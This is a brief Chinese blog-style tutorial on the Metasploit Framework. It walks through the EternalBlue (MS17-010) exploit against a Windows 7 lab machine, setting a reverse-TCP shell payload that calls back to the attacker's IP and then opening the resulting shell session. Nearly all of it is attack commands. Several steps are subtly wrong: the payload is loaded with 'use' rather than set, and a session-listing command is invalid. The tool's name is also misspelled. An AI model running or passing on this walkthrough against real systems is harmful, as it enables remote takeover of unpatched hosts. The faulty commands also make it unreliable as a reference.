metaspliot简介
metaspliot是一个漏洞框架,全称为The Metasploit Framework,简称为MSF。
流程需求
- kali攻击机 192.168.3.26
- windows 7靶机 192.168.3.28
实例演示--exploit模块介绍
1.使用use调用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
2.设置攻击参数
运行命令"show options"。(rhosts 代表目标主机IP地址,rport代表目标主机端口)
3.设置目标主机IP地址
set rhosts 192.168.3.28
4.使用反弹shell的payload
use exploit/windows/x64/shell_reverse_tcp
5.查看payload的配置信息
show options
6.设置回连IP地址。(即本机IP地址)
set lhost 192.168.3.26
7.在完成所有配置信息时,我们再次检验配置是否正确。
show options
8.开始渗透攻击,运行命令,从图中我们可以看到渗透攻击已成功,生成一个会话。
exploit -j
9.我们查看会话,可以看到我们之前建立的会话。
show sessions
10.以交互的形式打开会话,从图中可以看出来,我们成功的获取了目标shell。
sessions -i 1
到这里就完成了mesploit exploit模块的介绍,如果想了解更多的Kali工具,请关注我!